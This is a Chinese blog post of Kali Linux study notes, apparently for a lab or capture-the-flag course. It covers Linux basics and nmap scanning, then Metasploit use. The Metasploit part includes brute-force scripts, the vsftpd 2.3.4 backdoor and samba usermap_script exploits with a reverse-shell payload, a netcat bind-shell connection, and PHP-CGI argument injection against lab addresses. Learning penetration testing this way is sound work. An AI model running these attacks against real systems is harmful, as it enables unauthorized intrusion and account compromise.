Kali的学习笔记

常用文件修改指令

用法:# cp 源文件/目标文件夹    
将源文件复制到目标文件夹下 如:
cp 1.txt /root/2.txt
将1.txt文件复制到root目录下2.txt
cp -r 复制目录

2、删除命令 rm
用法:rm 文件名  
rm 1.txt 删除1.txt文件  
rm - rf 强制删除文件夹

3、移动、重命名 mv
用法:移动, mv 原文件  /目标文件夹    
mv 1.txt /root/ 将1.txt移动到root目录下

4.touch user.txt  创建user文件

Linux用户新建

      passwd  username更改用户名的密码
      adduser usename 添加用户名
      passwd [用户名]    更改密码
      usermod -a -G sudo username -a  仅和-G一块使用,将用户添加到附属组群。
      CTRL+Z 强制退出msfconsole工具中
设置kali的ip地址
 vim	/etc/network/interfaces  提取root权限
 auto  eth0 #开机自动激活
 iface eth0 inet static #静态IP
 address 192.168.1.1 #本机IP 
 netmask 255.255.255.0 #子网掩码
 gateway 192.168.1.1 #网关
-------------------------------
/etc/init.d/networking restart 重启网卡服务

SSH远程连接服务

systemctl status ssh   先查看开启或未开的状态
systemctl start ssh    运行远程服务命令
systemctl enable ssh   设置为开机自启的命令
vim /etc/ssh/ssh_config     
vim是超级链接,etc目录  vim前后必须加空格 vi是普通文本
login 登录 prohibit 阻止
permit root login : prohibit-password 
不将上面的命令改为yes,只能用dcn用户登录

kali工具介绍
nmap工具的使用
   nmap 识别活跃主机 (网络安全扫描)
           1.列举网络主机清单
            2.管理服务升级调度
             3.监控主机
             4.服务运行状况
nmap扫描端口状况
       -Open(开放的):应用程序正在这个端口上监听连接
        -Closed(关闭的):端口对探测做出了响应,但是现在没有应用程序在监听这个端口。
        -Filtered(过滤的):端口没有对探测做出响应,但是现在没有应用程序在监听这个端口
       -Unfiltered(未被过滤的):端口对探测做出来响应,但是Nmap无法确定它们是关闭还是开放。
        -Open/Filtered:端口被过滤或者是开放的,Nmap无法做出判断。
        -Closed/Filtered:端口被过滤或者是关闭的,Nmap无法做出判断。   

具体指令
  指纹识别    
        nmap -sP    //同于其他的扫描,他只扫描该网段下的端口,不是发现开放端口的
 SYN半开放扫描 
        nmap -sS 1.1.1.1 tcp SYN Scan (sS)    //这是一个基本的扫描方式,半开放式扫描因为这种技术使得 Namp不需要通过完整的握手能够获得远程主机的信息
     nmap -sV 172.16.208.220 -ox 文件名.txt 将扫描的结果保存在文件名.txt(可以更换扫描方式)
      nmap -v -sV 172.16.208.0/24 -oA subnet_1 
        nmap -sV    //搜索服务版本信息 
        nmap -v     //详细输出扫描情况 
        -oA     //-oA将数据以图表的形式展现出来
        subnet_1   //子网的意思
sT TCP扫描
        nmap -O 1.1.1.1    //扫描目标操作系统
        PN NO ping  //扫描
        nmap -O -PN 192.168.1.1/24 
     //如果远程主机有防火墙IDS和IPS系统你可以使用-PN命令来确保不ping远程主机因为有时候防火墙会组织掉ping请求,-PN命令 告诉Nmap不用ping远程主机  
      nmap -A OS       //识别,版本探测,脚本扫描和traceroute综合扫描
 NSE脚本扫描
     nmap --script vuln <target>      //(script这个文件名主要放置脚本)漏洞扫描
     nmap --script=mysql-brute <target>   // mysql爆破     (p22为端口号)
     nmap -p22 --script=ssh-brute 1.1.1.1    //ssh爆破
     nmap -p21 --script ftp-syst 1.1.1.1    //ftp爆破  
      nmap -p 21 --script ftp-anon.nse -v 192.168.3.23      //ftp-anon.nse 检查目标ftp是否允许匿名登录,光能登陆还不够,它还会自动检测目录是否可读写,比如你想快速批量抓一些ftp(视频上演示的是TCP)
      nmap -sP 172.16.208.0/24    //扫描该网段的主机信息
      nmap -p 22-30 172.16.208.0/24    //指定端口范围扫描该网段下的端口号
 UDP服务
     nmap -sU 1.1.1.1     //用nmap扫描UDP服务
      nmap -Pn   //端口扫描

metasplit
在kali终端输入msfconsole
metasplit 
   辅助模块
   渗透攻击模块
   后渗透攻击模块
   攻击载荷模块
   编码器模块
   空指令模块
Payload 指攻击成功促使目标运行的一段代码
exploit比作火箭,payload就是火箭上的子弹头.
      一.渗透攻击模块(explo)利用发现的安全漏洞或配置对远程目标系统进行攻击的代码
     (1)主动渗透模块(服务端渗透)
     (2)被动渗透模块 (客户端渗透)
      二.辅助模块(Aux)  实现信息收集口令猜测,
Dos攻击等无法直接取得服务器权限的攻击
       三.攻击载荷模块(Nop)     空指令 典型控制令就是空操作,数据缓冲区时 在shellcode之前添加控制令,这样触发执行shellcode,有较大安全区着陆,避免受到内存 地址随机化,返回地址计算机偏差照成shellcode失败 (提高攻击的正确率)
     四.编码器模块(encode):   免杀,逃避 反病毒软件等 
     五.攻击载荷模块(payload):    指攻击成功促使目标运行的一段代码
     六.后渗透模块(post):   用于维持访问

在kali里搜索searchsploit(精确搜索)
在msf将kali搜索下的漏洞加以搜索
输入指令 use unix/irc...
      info  查找信息 
      set rhost IP地址 
      run 运行
      whoami  展示当前用户名
      halt 立刻关机
      reboot 立刻重启
      back 返回msf工具

metasplit meterpreter
Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,双击载荷在触发漏洞后能够返回给一个控制通道
      help:查看帮助信息
      background:允许用户在后台Meterpreter会话
      downland:允许用户从入侵主机上下载文件
      upload:允许用户上传文件到入侵主机
      shell:允许用户在入侵主机上(仅是Windows主机)运行Windows shell命令
windows运行cmd命令 Linux运行daish
      session -i:允许用户切换会话
      ps:用于捕获目标主机正在运行的任务进程

metasplit进行信息搜索(msf)
扫描内容/方法:
      nmap -v -sV 网络/掩码 -oA 文件名称
       nmap -sV 搜索服务版本信息 
        nmap -v 详细输出扫描情况 
        -oA -oA将数据以图表的形式展现出来
扫描数据处理:
      cat subne_1.gnmap | grep 80/open | awk '{print $2}'
搜索这个文件中80端口的IP地址数
      search portscan 端口扫描
      cat /etc/passwd查找所有用户的列表
      w 可以查找当前活跃的用户列表
      cat /etc/group 查看用户组
      userdel 用户 删除用户
      userdel -f 连同用户目录一并删除

FTP漏洞扫描 
      search vsftp
      [vsftp]是FTPserver段上的服务[在2.3.4版本中有漏洞]
FTP漏洞扫描
      search ftp_version 查找ftp版本  {version版本}
      use exploit/unix/ftp/vsftpd_234_backdoor 

搜索mysql数据库
      use auxiliary/scanner/mysql/mysql_login 进入这个目录
      touch user.txt 生成一个user.txt
      创建一个user.txt 写入用户
      创建另一个pass.txt 写入密码(随便写入)
      show options 显示配置
           1.set rhosts 172.16.208.0
           2.set threads 100 线程数为100 平时为单线程
           3.set  pass_user  /home/dcn/pass/txt
           4.set  pass_FILE   /home/dcn/pass/txt
        mysql -h 172.16.208.0 -uroot -p
         mysql -h 【-h选择主机】172.16.208.0  -uroot 【uroot提示无密码】
    有密码后面加 -p 
   
metasploit samba 漏洞攻击
扫描端口
           nmap -sV -p 139 445 IP地址 探测目标端口服务版本信息
进入msfconsole 搜索攻击脚本
           search samba 
           use exploit/multi/samba/usermap_script  配置对应的payload show payloads
           set payload cmd/unix/reverse 
           set lhost 172.16.208.220 输入本机ip 

metasploit 弱口令攻击
           nmap -sV 172.16.208.215 探测目标IP的端口
           nc 172.16.208.215 1524 (1524为端口号)  

metasploit php cgi 漏洞利用
       nmap -sV -p80 172.16.1.1 
       cd /usrshare/nmap/scripts 进入这个目录之后
       ls | grep php-version 筛选搜索这个脚本
       在kaili上输入或在msfconsole控制台输入
       nmap --script http-php-version -p80 172.16.208.0 查找是否有符合的漏洞
       
use exploit/multi/http/php_cgi_arg_injiection 进行漏洞攻击
       set rhost 172.16.208.1 
       exploit 攻击之后进入meterperter会话
       ? 可以观看可执行操作
      攻击进入这个模式就可以查看目录获取flag值
       background 切到后台
       sessions 回到先前控制台
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值